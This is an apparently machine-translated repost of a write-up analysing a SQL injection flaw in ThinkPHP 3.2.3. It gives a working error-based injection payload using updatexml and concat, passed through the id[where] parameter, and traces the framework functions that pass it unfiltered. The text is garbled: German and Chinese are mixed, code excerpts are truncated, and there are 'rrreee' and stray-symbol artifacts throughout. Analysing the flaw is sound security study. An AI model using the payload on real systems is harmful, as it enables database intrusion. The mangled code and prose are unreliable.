Heim >Backend-Entwicklung >PHP-Problem >Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen

Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen

WBOYnach vorne
2022-04-11 18:56:526576Durchsuche

Dieser Artikel vermittelt Ihnen relevantes Wissen über thinkphp. Er stellt hauptsächlich die damit verbundenen Probleme der thinkPHP3.2.3sql-Injection-Schwachstelle vor und umfasst auch die m-Methode, die d-Methode, die u-Methode und andere verwandte Inhalte . Hilfreich.

Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen

Empfohlenes Lernen: „PHP-Video-Tutorial


Rette den Feind:

  • Zusammenfassung gängiger Methoden in ThinkPHP: M-Methode, D-Methode, U-Methode , Ich verwende

  • Thinkphp3.2.3 Sicherheitsentwicklungsanweisungen


  1. Der erste Schritt besteht darin, es im www-Verzeichnis abzulegen (ich verwende phpstudy für Windows)! ! ! !

  2. Erstellen Sie eine Datenbank. Der Tabellenname muss mit dem Namen übereinstimmen, den Sie als Nächstes verwenden möchten

  3. Konfigurationskontrollserver: WWWthinkphp3.2.3ApplicationHomeControllerIndexController.class.php

    <?phpnamespace  Home\Controller;use Think\Controller;class IndexController extends Controller {
        public function index(){
    		$data = M('user')->find(I('GET.id'));
  4. test:

  5. Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechentext


?id[wobei]=1 und 1 = updatexml(1, concat(0x7e,user(),0x7e),1)%23

Es stimmt, dass die Fehlerinjektion erfolgreich war, und das alles aufgrund der Existenz dieses Codes: $data = M('user')-&gt ;find(I('GET.id'));

An den I- und M-Methoden ist nichts auszusetzen. Das eigentliche Problem liegt in der

?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

确实报错注入成功,一切都是因为这句代码的存在:$data = M('user')->find(I('GET.id'));


  1. find 方法上,来自/ThinkPHP/Mode/Lite/Model.class.php
 public function find($options=array()) {   
        // 根据复合主键查找记录
        $pk  =  $this->getPk();
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {//但是会进入这里
            // 根据复合主键查询
            $count = 0;
            foreach (array_keys($options) as $key) {
                if (is_int($key)) $count++; 
            if ($count == count($pk)) {
                $i = 0;
                foreach ($pk as $field) {
                    $where[$field] = $options[$i];
                $options['where']  =  $where;
            } else {
                return false;
        // 总是查找一条记录
        $options['limit']   =   1;
        // 分析表达式
        $options            =   $this->_parseOptions($options);//前面都没有什么影响,重点是这里的函数调用
     	$resultSet          =   $this->db->select($options);//重要的一步



protected function _parseOptions($options=array()) {
            $options =  array_merge($this->options,$options);
        // 字段类型验证
        if(isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) {//这里不满足is_array($options['where'])
            // 对数组查询条件进行字段类型检查
            foreach ($options['where'] as $key=>$val){
                $key            =   trim($key);
                    if(is_scalar($val)) {
                }elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){
        // 查询过后清空sql表达式组装 避免影响下次查询
        $this->options  =   array();
        // 表达式过滤
        return $options;



Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen

而且上面的操作也会清零 $options,所以这里可能是进错了



public function select($options=array()) {
        $this->model  =   $options['model'];
        $sql    = $this->buildSelectSql($options);
        $result   = $this->query($sql,!empty($options['fetch_sql']) ? true : false);
        return $result;


public function buildSelectSql($options=array()) {
        if(isset($options['page'])) {
            // 根据页数计算limit
            list($page,$listRows)   =   $options['page'];
            $page    =  $page>0 ? $page : 1;
            $listRows=  $listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20);
            $offset  =  $listRows*($page-1);
            $options['limit'] =  $offset.','.$listRows;
        $sql  =   $this->parseSql($this->selectSql,$options);
        return $sql;


public function parseSql($sql,$options=array()){
        $sql   = str_replace(
        return $sql;


protected function parseWhere($where) {
        $whereStr = '';
        if(is_string($where)) {//直接满足,直接进入
            // 直接使用字符串条件
            $whereStr = $where;
        }else{ // 使用数组表达式
            return empty($whereStr)?'':' WHERE '.$whereStr;}

最后$sql=where 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23


$result   = $this->query($sql,!empty($options['fetch_sql']) ? true : false);return $result;




?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23


Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen


Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen


Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen


Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen


Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen


SELECT * FROM user WHERE 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)# LIMIT 1
find-Methode , aus /ThinkPHP/Mode/Lite/ Model.class.php

rrreee2._parseOptions: Da es sich hauptsächlich um Optionen[wo] handelt, habe ich den gesamten irrelevanten Code gelöscht

🎜🎜/ ThinkPHP/Library/Think/Model.class.php🎜🎜 rrreee🎜3.🎜_options_filter🎜🎜🎜Nicht mehr hier🎜🎜 Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen🎜🎜Und der obige Vorgang löscht auch $options, sodass hier möglicherweise ein falscher Eintrag vorliegt🎜🎜Korrigieren Sie also die Verfolgung des zweiten Teils auf 🎜🎜 🎜2.select:/ThinkPHP/Library/ Think/Db/Driver.class.php🎜🎜rrreee🎜🎜3.buildSelectSql: Die Adresse ist dieselbe wie oben🎜🎜rrreee🎜🎜4.parseSql: Die Adresse ist dieselbe wie oben🎜🎜rrreee🎜🎜5.parseWhere: Das Gleiche wie oben🎜🎜rrreee🎜Finally $sql=where 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23🎜🎜Then🎜rrreee 🎜Der gesamte Prozess ist ohne jegliche Filterung. Seay-Analysen denken, dass PHP zu mühsam ist ,user(),0x7e),1)%23🎜🎜Verfolgt immer noch die Suchfunktion: 🎜🎜Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen🎜🎜Hier folgen und eintreten, Tracking fortsetzen. Am Ende des Trackings springt diese Funktion heraus und der Wert bleibt unverändert. Gleichzeitig Schritt in die nächste Funktion🎜🎜Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen🎜🎜Nachher Nach der Überprüfung sind wir in eine andere Funktion getreten: 🎜🎜Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen 🎜🎜BuildSelectSql weiter verfolgen: 🎜🎜Lassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen 🎜 🎜Continue folgt ParseSQL: 🎜🎜 Alt = select * from user where 1 and 1 = updatexm L (1, Concat (0x7e, user ( ),0x7e),1)# LIMIT 1🎜 Es ist immer noch einfach zu debuggen und erfordert im Grunde nicht viel Gehirneinsatz🎜🎜Empfohlenes Lernen: „🎜PHP-Video-Tutorial🎜“🎜🎜

Das obige ist der detaillierte Inhalt vonLassen Sie uns über die SQL-Injection-Schwachstelle in thinkPHP3.2.3 sprechen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Dieser Artikel ist reproduziert unter:csdn.net. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen